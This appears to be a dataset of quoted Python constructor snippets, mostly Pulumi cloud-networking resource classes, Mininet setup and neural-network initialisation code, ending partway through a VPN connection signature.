"def __init__( self, **params ):\n \n host = custom( CPULimitedHost, cpu=cpuShare() ) \n link = custom( TCLink, bw=args.bandwidth, delay=delay() )\n \n Mininet.__init__(\n self,\n topo=BarrierTransactionTopo( **params ),\n host=host,\n link=link )",
"def __init__(self, node1, node2, **kwargs):\n # Create links on remote node\n self.node1 = node1\n self.node2 = node2\n self.tunnel = None\n kwargs.setdefault('params1', {})\n kwargs.setdefault('params2', {})\n kwargs.setdefault('cls1', TCIntf)\n kwargs.setdefault('cls2', TCIntf)\n self.cmd = None # satisfy pylint\n Link.__init__(self, node1, node2, **kwargs)",
"def __init__(__self__,\n resource_name: str,\n opts: Optional[pulumi.ResourceOptions] = None,\n cluster_name: Optional[pulumi.Input[str]] = None,\n node_setup: Optional[pulumi.Input[pulumi.InputType['NodeSetupArgs']]] = None,\n resource_group_name: Optional[pulumi.Input[str]] = None,\n scale_settings: Optional[pulumi.Input[pulumi.InputType['ScaleSettingsArgs']]] = None,\n subnet: Optional[pulumi.Input[pulumi.InputType['ResourceIdArgs']]] = None,\n user_account_settings: Optional[pulumi.Input[pulumi.InputType['UserAccountSettingsArgs']]] = None,\n virtual_machine_configuration: Optional[pulumi.Input[pulumi.InputType['VirtualMachineConfigurationArgs']]] = None,\n vm_priority: Optional[pulumi.Input['VmPriority']] = None,\n vm_size: Optional[pulumi.Input[str]] = None,\n workspace_name: Optional[pulumi.Input[str]] = None,\n __props__=None):\n ...",
"def network_create(request, **kwargs):\n LOG.debug(\"network_create(): kwargs = %s\", kwargs)\n if 'tenant_id' not in kwargs:\n kwargs['tenant_id'] = request.user.project_id\n body = {'network': kwargs}\n network = neutronclient(request).create_network(body=body).get('network')\n return Network(network)",
"def __init__(__self__, *,\n backend_address_pool_name: pulumi.Input[str],\n backend_port: pulumi.Input[int],\n frontend_port_range_end: pulumi.Input[int],\n frontend_port_range_start: pulumi.Input[int],\n inbound_nat_pool_name: pulumi.Input[str],\n location: pulumi.Input[str],\n public_ip_address_name: pulumi.Input[str],\n resource_group: pulumi.Input[str]):\n pulumi.set(__self__, \"backend_address_pool_name\", backend_address_pool_name)\n pulumi.set(__self__, \"backend_port\", backend_port)\n pulumi.set(__self__, \"frontend_port_range_end\", frontend_port_range_end)\n pulumi.set(__self__, \"frontend_port_range_start\", frontend_port_range_start)\n pulumi.set(__self__, \"inbound_nat_pool_name\", inbound_nat_pool_name)\n pulumi.set(__self__, \"location\", location)\n pulumi.set(__self__, \"public_ip_address_name\", public_ip_address_name)\n pulumi.set(__self__, \"resource_group\", resource_group)",
"def __init__(__self__, *,\n network_tags: Optional[pulumi.Input['NetworkTagsArgs']] = None):\n if network_tags is not None:\n pulumi.set(__self__, \"network_tags\", network_tags)",
"def __init__(__self__, *,\n resource_group_name: pulumi.Input[str],\n annotation: Optional[pulumi.Input[str]] = None,\n infrastructure_express_route_connections: Optional[pulumi.Input[Sequence[pulumi.Input['ExpressRouteConnectionInformationArgs']]]] = None,\n ipv4_address_space: Optional[pulumi.Input[str]] = None,\n ipv6_address_space: Optional[pulumi.Input[str]] = None,\n is_workload_management_network_enabled: Optional[pulumi.Input[Union[str, 'IsWorkloadManagementNetworkEnabled']]] = None,\n location: Optional[pulumi.Input[str]] = None,\n managed_resource_group_configuration: Optional[pulumi.Input['ManagedResourceGroupConfigurationArgs']] = None,\n network_fabric_controller_name: Optional[pulumi.Input[str]] = None,\n nfc_sku: Optional[pulumi.Input[Union[str, 'NfcSku']]] = None,\n tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,\n workload_express_route_connections: Optional[pulumi.Input[Sequence[pulumi.Input['ExpressRouteConnectionInformationArgs']]]] = None):\n pulumi.set(__self__, \"resource_group_name\", resource_group_name)\n if annotation is not None:\n pulumi.set(__self__, \"annotation\", annotation)\n if infrastructure_express_route_connections is not None:\n pulumi.set(__self__, \"infrastructure_express_route_connections\", infrastructure_express_route_connections)\n if ipv4_address_space is None:\n ipv4_address_space = '10.0.0.0/19'\n if ipv4_address_space is not None:\n pulumi.set(__self__, \"ipv4_address_space\", ipv4_address_space)\n if ipv6_address_space is None:\n ipv6_address_space = 'FC00::/59'\n if ipv6_address_space is not None:\n pulumi.set(__self__, \"ipv6_address_space\", ipv6_address_space)\n if is_workload_management_network_enabled is None:\n is_workload_management_network_enabled = 'True'\n if is_workload_management_network_enabled is not None:\n pulumi.set(__self__, \"is_workload_management_network_enabled\", is_workload_management_network_enabled)\n if location is not None:\n pulumi.set(__self__, \"location\", location)\n if managed_resource_group_configuration is not None:\n pulumi.set(__self__, \"managed_resource_group_configuration\", managed_resource_group_configuration)\n if network_fabric_controller_name is not None:\n pulumi.set(__self__, \"network_fabric_controller_name\", network_fabric_controller_name)\n if nfc_sku is None:\n nfc_sku = 'Standard'\n if nfc_sku is not None:\n pulumi.set(__self__, \"nfc_sku\", nfc_sku)\n if tags is not None:\n pulumi.set(__self__, \"tags\", tags)\n if workload_express_route_connections is not None:\n pulumi.set(__self__, \"workload_express_route_connections\", workload_express_route_connections)",
"def initialize_network(self, model, num_init=None, **net_args):\n\n self.net_args = net_args\n\n if num_init is None:\n self.num_init = 1\n else:\n self.num_init = num_init\n\n nets = []\n for i in range(self.num_init):\n nets.append( model(dim_inp=self.dim_inp, \n dim_out=self.dim_out, **net_args) )\n\n return nets",
"def __init__(__self__,\n resource_name: str,\n args: TransitRouterCidrArgs,\n opts: Optional[pulumi.ResourceOptions] = None):\n ...",
"def construct_network(self, n_units, n_samples=1, noise_dim=0,\n keep_p=1., nonlinearity=True, init_params=None, name=\"\"):\n print \"constructing network, n_units: \",n_units\n # TODO use kwargs for more elagant solutions to being called by this \n # base class\n assert keep_p ==1. and nonlinearity and noise_dim == 0\n\n assert init_params is None # this is implemented only in the Bayesian flow version of this function\n\n ### Define parameters of the network\n self.weights, self.biases, KL = {}, {}, 0.\n self.layers = []\n # Establish paramters of appromiate posterior over weights and\n # biases.\n for l in range(1, len(n_units)):\n with tf.variable_scope(name+'Layer_%d'%l):\n n_in, n_out = n_units[l-1], n_units[l]\n\n # use non neglidgible uncertainty if we are doing VI\n sigma_init = self.init_sigma_params\n\n w_prior_sigma, b_prior_sigma = self.w_prior_sigma, self.w_prior_sigma\n mu_init_sigma_w, mu_init_sigma_b = np.sqrt(1./(n_in)), 1.\n\n (w_mu, w_logstd), _, w_KL = utils.set_q(name+\"w_%d\"%l,\n sigma_prior=w_prior_sigma, mu_init_sigma=mu_init_sigma_w,\n sigma_init=sigma_init, n_samples=0,\n size=[n_in, n_out], save_summary=True)\n\n # We use same init_sigma for weights and biases.\n (b_mu, b_logstd), _, b_KL = utils.set_q(name+\"b_%d\"%l,\n sigma_prior=b_prior_sigma, mu_init_sigma=mu_init_sigma_b,\n sigma_init=sigma_init, n_samples=0,\n size=[n_out], save_summary=True)\n self.weights['w_%d_mu'%l], self.weights['w_%d_std'%l] = w_mu, tf.nn.softplus(w_logstd)\n self.biases['b_%d_mu'%l], self.biases['b_%d_std'%l] = b_mu, tf.nn.softplus(b_logstd)\n\n self.params += [w_mu, b_mu, w_logstd, b_logstd]\n KL += w_KL + b_KL\n\n # Add an extra dimension to correspond to samples.\n prev_layer = tf.stack([self.x]*n_samples)\n self.layers.append(prev_layer)\n # shape is [n_samples, ?, dim(x)]\n\n ### Define activations in each layer\n for l in range(1,len(n_units)):\n print \"defining activations in layer %d\"%l\n # Multiply with weight matrix and add bias\n prev_layer = tf.reshape(prev_layer, [-1, n_units[l-1]])\n layer_pre_bias = tf.matmul(prev_layer, self.weights['w_%d_mu'%l])\n layer_pre_bias = tf.reshape(layer_pre_bias, [n_samples, -1, n_units[l]])\n # Shape of layer_pre_bias is [n_samples, ?, n_units[l]]\n\n # add mean bias term\n layer = tf.add(layer_pre_bias, self.biases['b_%d_mu'%l][None, None, :])\n\n # Calculate the noise in each hidden unit.\n # must use absolute value of activation because final layer may\n # have negative values.\n layer_var = tf.matmul(tf.reshape(prev_layer**2,[-1,\n n_units[l-1]]), self.weights['w_%d_std'%l]**2)\n layer_var = tf.reshape(layer_var, [n_samples, -1, n_units[l]])\n layer_var += self.biases['b_%d_std'%l]**2\n\n # Now sample noise and add scaled noise.\n # This constitutes the local reparameterization trick.\n eps = tf.random_normal(name='eps_%d'%l, mean=0.,\n stddev=1.0, shape=[n_samples, 1, n_units[l]])\n layer_sigma = tf.sqrt(layer_var)\n layer += layer_sigma*eps\n with tf.name_scope(name+\"Neural_Network_Activations_%d\"%l):\n tf.summary.histogram(name+\"Layer_%d_sigmas\"%l, layer_sigma)\n tf.summary.histogram(name+\"Layer_%d_activations_pre_tanh\"%l, layer)\n\n # Add tanh nonlinearity\n if l != (len(n_units) - 1): layer = tf.nn.tanh(layer)\n\n with tf.name_scope(name+\"Neural_Network_Activations_%d\"%l):\n tf.summary.histogram(name+\"Layer_%d_activations_post_tanh\"%l,layer)\n\n prev_layer = layer\n self.layers.append(prev_layer)\n self.KL_BNN = KL\n return prev_layer",
"def __init__(__self__, *,\n group: Optional[pulumi.Input[str]] = None,\n name: Optional[pulumi.Input[str]] = None,\n namespace: Optional[pulumi.Input[str]] = None,\n resource: Optional[pulumi.Input[str]] = None,\n version: Optional[pulumi.Input[str]] = None):\n if group is not None:\n pulumi.set(__self__, \"group\", group)\n if name is not None:\n pulumi.set(__self__, \"name\", name)\n if namespace is not None:\n pulumi.set(__self__, \"namespace\", namespace)\n if resource is not None:\n pulumi.set(__self__, \"resource\", resource)\n if version is not None:\n pulumi.set(__self__, \"version\", version)",
"def __init__(self, pool_guid, dataset_name, obj_num, obj_type):\n self.pool_guid = pool_guid\n self.dataset_name = dataset_name\n self.obj_num = obj_num\n self.obj_type = obj_type",
"def __init__(self, layerNeurons, initialWeights = None, layerTypes=None, **kwargs):\r\n \r\n # Ensure that there is at-least one input and one output layer in the network\r\n assert len(layerNeurons)>1, \"At least one input layer and one output layer is needed\"\r\n \r\n # Get the total number of weights needed in the network\r\n totalWeightCount = NeuralNetwork.getSizeOfWeightVector(layerNeurons)\r\n \r\n # Initialise the weights with the initializer or random values\r\n if initialWeights is None:\r\n self.weights = np.random.uniform(-1/np.sqrt(layerNeurons[0]), 1/np.sqrt(layerNeurons[0]), totalWeightCount)\r\n else:\r\n assert len(initialWeights) == totalWeightCount, (\"Length of initial weight matrix incorrect. You need \"+str(totalWeightCount)+\" weights\")\r\n self.weights = np.array(initialWeights, dtype = np.float64) \r\n \r\n # create an empty array of layers\r\n self.layers = []\r\n layerBlockStart = 0\r\n \r\n if layerTypes is None or len(layerTypes)<(len(layerNeurons)-1):\r\n layerTypes=[NetworkLayer]*(len(layerNeurons)-1)\r\n \r\n for layerInputDimention, layerOutputDimention, layerType in zip(layerNeurons, layerNeurons[1:], layerTypes):\r\n # initialise each layer with its input and output dimentions and bi-directional pointers to the relivant weights\r\n layerBlockEnd = layerBlockStart+(layerInputDimention*layerOutputDimention)\r\n layerBiasEnd = layerBlockEnd+layerOutputDimention\r\n newLayer = layerType(layerInputDimention, layerOutputDimention, \r\n self.weights[..., layerBlockStart:layerBlockEnd], \r\n self.weights[..., layerBlockEnd:layerBiasEnd], **kwargs)\r\n self.layers.append(newLayer)\r\n \r\n layerBlockStart = layerBiasEnd\r\n \r\n # Tell the output later to use a different function to calculate the delta \r\n newLayer.calcDelta = newLayer.calcDeltaOutputLayer",
"def __init__(__self__,\n resource_name: str,\n opts: Optional[pulumi.ResourceOptions] = None,\n name: Optional[pulumi.Input[str]] = None,\n network_connection: Optional[pulumi.Input[str]] = None,\n network_excludes: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n network_includes: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n password_change: Optional[pulumi.Input[str]] = None,\n password_reset: Optional[pulumi.Input[str]] = None,\n password_unlock: Optional[pulumi.Input[str]] = None,\n policy_id: Optional[pulumi.Input[str]] = None,\n priority: Optional[pulumi.Input[int]] = None,\n status: Optional[pulumi.Input[str]] = None,\n users_excludeds: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n __props__=None):\n ...",
"def __init__(__self__,\n resource_name: str,\n opts: Optional[pulumi.ResourceOptions] = None,\n description: Optional[pulumi.Input[str]] = None,\n destination_region_id: Optional[pulumi.Input[str]] = None,\n destination_zone_id: Optional[pulumi.Input[str]] = None,\n group_name: Optional[pulumi.Input[str]] = None,\n rpo: Optional[pulumi.Input[int]] = None,\n source_region_id: Optional[pulumi.Input[str]] = None,\n source_zone_id: Optional[pulumi.Input[str]] = None,\n __props__=None):\n ...",
"def __init__(self, *args):\n _snap.TModeNet_swiginit(self, _snap.new_TModeNet(*args))",
"def generateArgsList(self, I1, I2, O1, O2, O3, N, M, S, C ):\n ArgsList = [ \n \"-n\", str(N), \n # \"-m\", str(M), \n # \"-s\", str(S), \n \"-c\", str(C), \n ]\n if I1 > 0 or I2 > 0:\n if I1 > 0:\n ArgsList.append(\"-i1\")\n ArgsList.append(str(I1)) \n if I2 > 0:\n ArgsList.append(\"-i2\")\n ArgsList.append(str(I2))\n else: \n ArgsList.append(\"--noinput\")\n \n if O1 > 0 or O2 > 0 or O3 > 0:\n if O1 > 0:\n ArgsList.append(\"-o1\")\n ArgsList.append(str(O1)) \n if O2 > 0:\n ArgsList.append(\"-o2\")\n ArgsList.append(str(O2))\n if O3 > 0:\n ArgsList.append(\"-o3\")\n ArgsList.append(str(O3))\n else: \n ArgsList.append(\"--nooutput\")\n \n ArgsList.append(\"--nosummary\")\n ArgsList.append(\"--verbose\")\n return ArgsList",
"def __init__(self, *args, **keywords):\n attribs = keywords if (len(args) <= 0) else list(args).pop()\n Entity.__init__(self, attribs)",
"def __init__(__self__, *,\n acl_id: pulumi.Input[str],\n dest_cidr: pulumi.Input[str],\n dest_port_range: pulumi.Input[str],\n direction: pulumi.Input[str],\n ip_protocol: pulumi.Input[str],\n policy: pulumi.Input[str],\n source_cidr: pulumi.Input[str],\n source_port_range: pulumi.Input[str],\n description: Optional[pulumi.Input[str]] = None,\n priority: Optional[pulumi.Input[int]] = None):\n pulumi.set(__self__, \"acl_id\", acl_id)\n pulumi.set(__self__, \"dest_cidr\", dest_cidr)\n pulumi.set(__self__, \"dest_port_range\", dest_port_range)\n pulumi.set(__self__, \"direction\", direction)\n pulumi.set(__self__, \"ip_protocol\", ip_protocol)\n pulumi.set(__self__, \"policy\", policy)\n pulumi.set(__self__, \"source_cidr\", source_cidr)\n pulumi.set(__self__, \"source_port_range\", source_port_range)\n if description is not None:\n pulumi.set(__self__, \"description\", description)\n if priority is not None:\n pulumi.set(__self__, \"priority\", priority)",
"def __init__(self, *args):\n this = _elas.new_Elas_parameters(*args)\n try:\n self.this.append(this)\n except Exception:\n self.this = this",
"def lease_create_args(name=None, start='now', length=None, end=None,\n nodes=1, resource_properties=''):\n if name is None:\n name = 'lease-{}'.format(random_base32(6))\n\n if start == 'now':\n start = datetime.datetime.now(tz=tz.tzutc()) + datetime.timedelta(seconds=70)\n\n if length is None and end is None:\n length = DEFAULT_LEASE_LENGTH\n elif length is not None and end is not None:\n raise ValueError(\"provide either 'length' or 'end', not both\")\n\n if end is None:\n if isinstance(length, numbers.Number):\n length = datetime.timedelta(seconds=length)\n end = start + length\n\n if resource_properties:\n resource_properties = json.dumps(resource_properties)\n\n reservations = [{\n 'resource_type': 'physical:host',\n 'resource_properties': resource_properties,\n 'hypervisor_properties': '',\n 'min': str(nodes), 'max': str(nodes),\n }]\n\n query = {\n 'name': name,\n 'start': start.strftime(BLAZAR_TIME_FORMAT),\n 'end': end.strftime(BLAZAR_TIME_FORMAT),\n 'reservations': reservations,\n 'events': [],\n }\n return query",
"def __init__(self, **kwargs):\n super(VRPCluster, self).__init__(**kwargs)\n if self.subclusters is None:\n if \"demand\" in kwargs:\n self.demand = kwargs.get(\"demand\")\n else:\n raise AttributeError(\"Two cluster or index and demand must be given as arguments for VRPCluster\")\n else:\n self.demand = self.subclusters[0].demand + self.subclusters[1].demand\n\n def __repr__(self):\n return \"VRPCluster: {}, {}\".format(self.cluster_indices, self.demand)",
"def __init__(__self__, *,\n group: Optional[pulumi.Input[str]] = None,\n last_generation: Optional[pulumi.Input[int]] = None,\n name: Optional[pulumi.Input[str]] = None,\n namespace: Optional[pulumi.Input[str]] = None,\n resource: Optional[pulumi.Input[str]] = None,\n version: Optional[pulumi.Input[str]] = None):\n if group is not None:\n pulumi.set(__self__, \"group\", group)\n if last_generation is not None:\n pulumi.set(__self__, \"last_generation\", last_generation)\n if name is not None:\n pulumi.set(__self__, \"name\", name)\n if namespace is not None:\n pulumi.set(__self__, \"namespace\", namespace)\n if resource is not None:\n pulumi.set(__self__, \"resource\", resource)\n if version is not None:\n pulumi.set(__self__, \"version\", version)",
"def __init__(__self__,\n resource_name: str,\n opts: Optional[pulumi.ResourceOptions] = None,\n address1: Optional[pulumi.Input[str]] = None,\n address2: Optional[pulumi.Input[str]] = None,\n billing_contact_user: Optional[pulumi.Input[str]] = None,\n city: Optional[pulumi.Input[str]] = None,\n company_name: Optional[pulumi.Input[str]] = None,\n country: Optional[pulumi.Input[str]] = None,\n end_user_support_help_url: Optional[pulumi.Input[str]] = None,\n logo: Optional[pulumi.Input[str]] = None,\n opt_out_communication_emails: Optional[pulumi.Input[bool]] = None,\n phone_number: Optional[pulumi.Input[str]] = None,\n postal_code: Optional[pulumi.Input[str]] = None,\n state: Optional[pulumi.Input[str]] = None,\n support_phone_number: Optional[pulumi.Input[str]] = None,\n technical_contact_user: Optional[pulumi.Input[str]] = None,\n website: Optional[pulumi.Input[str]] = None,\n __props__=None):\n ...",
"def __init__(self, arg_list):\n parser = argparse.ArgumentParser(description=__doc__)\n\n parser.add_argument(\n \"catalogs\",\n nargs=\"+\",\n help=\"Path to input catalog(s)\"\n )\n\n parser.add_argument(\n \"-a\", \"--aggregate\",\n dest=\"aggregate\",\n action=\"store_true\",\n help=\"Produce NcML aggregations and add OPeNDAP endpoints\"\n )\n parser.add_argument(\n \"-w\", \"--wms\",\n dest=\"wms\",\n action=\"store_true\",\n help=\"Add WMS and WCS endpoint for aggregations\"\n )\n parser.add_argument(\n \"-o\", \"--output-dir\",\n dest=\"output_dir\",\n default=\"output_catalogs\",\n help=\"Directory to write modified catalog(s) to [default: %(default)s]\"\n )\n parser.add_argument(\n \"-n\", \"--ncml-dir\",\n dest=\"ncml_dir\",\n default=\"aggregations\",\n help=\"Directory to write NcML aggregations to if using --aggregate \"\n \"[default: %(default)s]\"\n )\n parser.add_argument(\n \"-s\", \"--server\",\n dest=\"thredds_server\",\n default=\"cci-odp-data.ceda.ac.uk\",\n help=\"The hostname of the THREDDS server on which the data will \"\n \"hosted. This is required to construct URLs to THREDDS \"\n \"catalogs in global attributes in aggregations \"\n \"[default: %(default)s]\"\n )\n parser.add_argument(\n \"--remote-agg-dir\",\n default=\"/usr/local/aggregations/\",\n help=\"Directory under which NcML aggregations are stored on the \"\n \"THREDDS server [default: %(default)s]\"\n )\n parser.add_argument(\n \"--data-dir\",\n dest=\"data_dir\",\n default=\"/neodc/esacci\",\n help=\"Directory under which data is stored, so that the THREDDS \"\n \"dataset root can be translated to give the real path on \"\n \"disk [default: %(default)s]\"\n )\n\n self.args = parser.parse_args(arg_list)\n\n if self.args.wms and not self.args.aggregate:\n parser.error(\"Cannot add WMS/WCS aggregations without --aggregate\")",
"def __init__(__self__,\n resource_name: str,\n opts: Optional[pulumi.ResourceOptions] = None,\n additional_egress_endpoints: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['EgressEndpointArgs']]]]] = None,\n cloud_services_network_name: Optional[pulumi.Input[str]] = None,\n enable_default_egress_endpoints: Optional[pulumi.Input[Union[str, 'CloudServicesNetworkEnableDefaultEgressEndpoints']]] = None,\n extended_location: Optional[pulumi.Input[pulumi.InputType['ExtendedLocationArgs']]] = None,\n location: Optional[pulumi.Input[str]] = None,\n resource_group_name: Optional[pulumi.Input[str]] = None,\n tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,\n __props__=None):\n ...",
"def __init__(__self__,\n resource_name: str,\n args: Optional[DomainArgs] = None,\n opts: Optional[pulumi.ResourceOptions] = None):\n ...",
"def __init__(__self__,\n resource_name: str,\n args: Optional[ServerArgs] = None,\n opts: Optional[pulumi.ResourceOptions] = None):\n ...",
"def __init__(self, D_in, H1, H2,H3, D_out):\n super(ThreeLayerNet, self).__init__()\n self.linear1 = torch.nn.Linear(D_in, H1)\n self.linear2 = torch.nn.Linear(H1, H2)\n self.linear3 = torch.nn.Linear(H2, H3)\n self.linear4 = torch.nn.Linear(H3, D_out)",
"def __init__(__self__,\n resource_name: str,\n opts: Optional[pulumi.ResourceOptions] = None,\n description: Optional[pulumi.Input[str]] = None,\n etag: Optional[pulumi.Input[str]] = None,\n file_shares: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['FileShareConfigArgs']]]]] = None,\n instance_id: Optional[pulumi.Input[str]] = None,\n kms_key_name: Optional[pulumi.Input[str]] = None,\n labels: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,\n location: Optional[pulumi.Input[str]] = None,\n networks: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['NetworkConfigArgs']]]]] = None,\n project: Optional[pulumi.Input[str]] = None,\n tier: Optional[pulumi.Input['InstanceTier']] = None,\n __props__=None):\n ...",
"def __init__(self, **kwargs):\n #super(Net, self).__init__()\n nn.Module.__init__(self)\n # Build CNN\n module, shapes, optim = build_neuron_network(**kwargs)\n self._configuration = kwargs\n self.add_module('cnn', module)\n self.shapes = shapes\n # Loss and optimization\n self.criterion = nn.MSELoss(reduction='mean')\n self.optimizer = optim\n self._kwargs = kwargs",
"def __init__(self, openfile=None, license=None, *args, **kwargs):\n # Environment pointer. First arg is license.\n # (const char* license, environ_ns* env, const char* locn)\n cnetica.NewNeticaEnviron_ns.argtypes = [c_char_p, c_void_p, c_char_p]\n cnetica.NewNeticaEnviron_ns.restype = c_void_p\n self.env = cnetica.NewNeticaEnviron_ns(ccharp(license), None, None)\n # Most applications have only one environment, but we keep\n # this environment specific to the object instance.\n\n # Initialize environment.\n mesg = create_string_buffer(MESGLEN)\n # (environ_ns* env, char* mesg)\n cnetica.InitNetica2_bn.argtypes = [c_void_p, c_char_p]\n cnetica.InitNetica2_bn.restype = c_int\n self.res = cnetica.InitNetica2_bn(self.env, mesg)\n logger.info(mesg.value)\n\n # Create net.\n if openfile:\n # Read net from file.\n file_p = self._newstream(openfile) # Create stream.\n # Net pointer.\n # (stream_ns* file, int options)\n cnetica.ReadNet_bn.argtypes = [c_void_p, c_int]\n cnetica.ReadNet_bn.restype = c_void_p\n self.net = cnetica.ReadNet_bn(file_p, REGULAR_WINDOW)\n else:\n # Create new empty net.\n # TODO: Figure out significance of name arg.\n # (const char* name, environ_ns* env)\n cnetica.NewNet_bn.argtypes = [c_char_p, c_void_p]\n cnetica.NewNet_bn.restype = c_void_p\n self.net = cnetica.NewNet_bn(ccharp('BayesNet'), self.env)\n self.setautoupdate() # Auto update on by default.",
"def __init__(self,model:nn.Module,dataloader,func_loss,optimizer,scheduler,*,taskstr,taskstr_short,n_max_epoch,n_sample_per_epoch):\n self.model= model\n self.dataloader = dataloader\n self.func_loss = func_loss\n self.optimizer = optimizer\n self.scheduler = scheduler\n\n self.n_max_epoch = n_max_epoch\n self.n_sample_per_epoch = n_sample_per_epoch\n self.taskstr = taskstr\n self.taskstr_short = taskstr_short",
"def __init__(__self__,\n resource_name: str,\n args: Optional[TransferConfigArgs] = None,\n opts: Optional[pulumi.ResourceOptions] = None):\n ...",
"def __init__(self, a, b, c):\r\n self.a = a\r\n self.b = b\r\n self.c = c",
"def __init__(self, *args):\n this = _libsbml.new_ListOfLocalParameters(*args)\n try: self.this.append(this)\n except: self.this = this",
"def __init__(self,\r\n name=None,\r\n lan_ip=None,\r\n uplink=None,\r\n public_port=None,\r\n local_port=None,\r\n allowed_ips=None,\r\n protocol=None):\r\n\r\n # Initialize members of the class\r\n self.name = name\r\n self.lan_ip = lan_ip\r\n self.uplink = uplink\r\n self.public_port = public_port\r\n self.local_port = local_port\r\n self.allowed_ips = allowed_ips\r\n self.protocol = protocol",
"def __init__(self, *args, **kwargs):\n self._args = args\n self._kwargs = kwargs",
"def __init__(__self__, *,\n address: Optional[pulumi.Input[str]] = None,\n name: Optional[pulumi.Input[str]] = None,\n subnet_prefix_length: Optional[pulumi.Input[int]] = None):\n if address is not None:\n pulumi.set(__self__, \"address\", address)\n if name is not None:\n pulumi.set(__self__, \"name\", name)\n if subnet_prefix_length is not None:\n pulumi.set(__self__, \"subnet_prefix_length\", subnet_prefix_length)",
"def __init__(__self__, *,\n arn: Optional[pulumi.Input[str]] = None,\n core_network_arn: Optional[pulumi.Input[str]] = None,\n core_network_attachment_arn: Optional[pulumi.Input[str]] = None,\n customer_gateway_configuration: Optional[pulumi.Input[str]] = None,\n customer_gateway_id: Optional[pulumi.Input[str]] = None,\n enable_acceleration: Optional[pulumi.Input[bool]] = None,\n local_ipv4_network_cidr: Optional[pulumi.Input[str]] = None,\n local_ipv6_network_cidr: Optional[pulumi.Input[str]] = None,\n outside_ip_address_type: Optional[pulumi.Input[str]] = None,\n remote_ipv4_network_cidr: Optional[pulumi.Input[str]] = None,\n remote_ipv6_network_cidr: Optional[pulumi.Input[str]] = None,\n routes: Optional[pulumi.Input[Sequence[pulumi.Input['VpnConnectionRouteArgs']]]] = None,\n static_routes_only: Optional[pulumi.Input[bool]] = None,\n tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,\n tags_all: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,\n transit_gateway_attachment_id: Optional[pulumi.Input[str]] = None,\n transit_gateway_id: Optional[pulumi.Input[str]] = None,\n transport_transit_gateway_attachment_id: Optional[pulumi.Input[str]] = None,\n tunnel1_address: Optional[pulumi.Input[str]] = None,\n tunnel1_bgp_asn: Optional[pulumi.Input[str]] = None,\n tunnel1_bgp_holdtime: Optional[pulumi.Input[int]] = None,\n tunnel1_cgw_inside_address: Optional[pulumi.Input[str]] = None,\n tunnel1_dpd_timeout_action: Optional[pulumi.Input[str]] = None,\n tunnel1_dpd_timeout_seconds: Optional[pulumi.Input[int]] = None,\n tunnel1_enable_tunnel_lifecycle_control: Optional[pulumi.Input[bool]] = None,\n tunnel1_ike_versions: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n tunnel1_inside_cidr: Optional[pulumi.Input[str]] = None,\n tunnel1_inside_ipv6_cidr: Optional[pulumi.Input[str]] = None,\n tunnel1_log_options: Optional[pulumi.Input['VpnConnectionTunnel1LogOptionsArgs']] = None,\n tunnel1_phase1_dh_group_numbers: Optional[pulumi.Input[Sequence[pulumi.Input[int]]]] = None,\n tunnel1_phase1_encryption_algorithms: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n tunnel1_phase1_integrity_algorithms: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n tunnel1_phase1_lifetime_seconds: Optional[pulumi.Input[int]] = None,\n tunnel1_phase2_dh_group_numbers: Optional[pulumi.Input[Sequence[pulumi.Input[int]]]] = None,\n tunnel1_phase2_encryption_algorithms: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n tunnel1_phase2_integrity_algorithms: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n tunnel1_phase2_lifetime_seconds: Optional[pulumi.Input[int]] = None,\n tunnel1_preshared_key: Optional[pulumi.Input[str]] = None,\n tunnel1_rekey_fuzz_percentage: Optional[pulumi.Input[int]] = None,\n tunnel1_rekey_margin_time_seconds: Optional[pulumi.Input[int]] = None,\n tunnel1_replay_window_size: Optional[pulumi.Input[int]] = None,\n tunnel1_startup_action: Optional[pulumi.Input[str]] = None,\n tunnel1_vgw_inside_address: Optional[pulumi.Input[str]] = None,\n tunnel2_address: Optional[pulumi.Input[str]] = None,\n tunnel2_bgp_asn: Optional[pulumi.Input[str]] = None,\n tunnel2_bgp_holdtime: Optional[pulumi.Input[int]] = None,\n tunnel2_cgw_inside_address: Optional[pulumi.Input[str]] = None,\n tunnel2_dpd_timeout_action: Optional[pulumi.Input[str]] = None,\n tunnel2_dpd_timeout_seconds: Optional[pulumi.Input[int]] = None,\n tunnel2_enable_tunnel_lifecycle_control: Optional[pulumi.Input[bool]] = None,\n tunnel2_ike_versions: 
Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n tunnel2_inside_cidr: Optional[pulumi.Input[str]] = None,\n tunnel2_inside_ipv6_cidr: Optional[pulumi.Input[str]] = None,\n tunnel2_log_options: Optional[pulumi.Input['VpnConnectionTunnel2LogOptionsArgs']] = None,\n tunnel2_phase1_dh_group_numbers: Optional[pulumi.Input[Sequence[pulumi.Input[int]]]] = None,\n tunnel2_phase1_encryption_algorithms: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n tunnel2_phase1_integrity_algorithms: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n tunnel2_phase1_lifetime_seconds: Optional[pulumi.Input[int]] = None,\n tunnel2_phase2_dh_group_numbers: Optional[pulumi.Input[Sequence[pulumi.Input[int]]]] = None,\n tunnel2_phase2_encryption_algorithms: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n tunnel2_phase2_integrity_algorithms: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n tunnel2_phase2_lifetime_seconds: Optional[pulumi.Input[int]] = None,\n tunnel2_preshared_key: Optional[pulumi.Input[str]] = None,\n tunnel2_rekey_fuzz_percentage: Optional[pulumi.Input[int]] = None,\n tunnel2_rekey_margin_time_seconds: Optional[pulumi.Input[int]] = 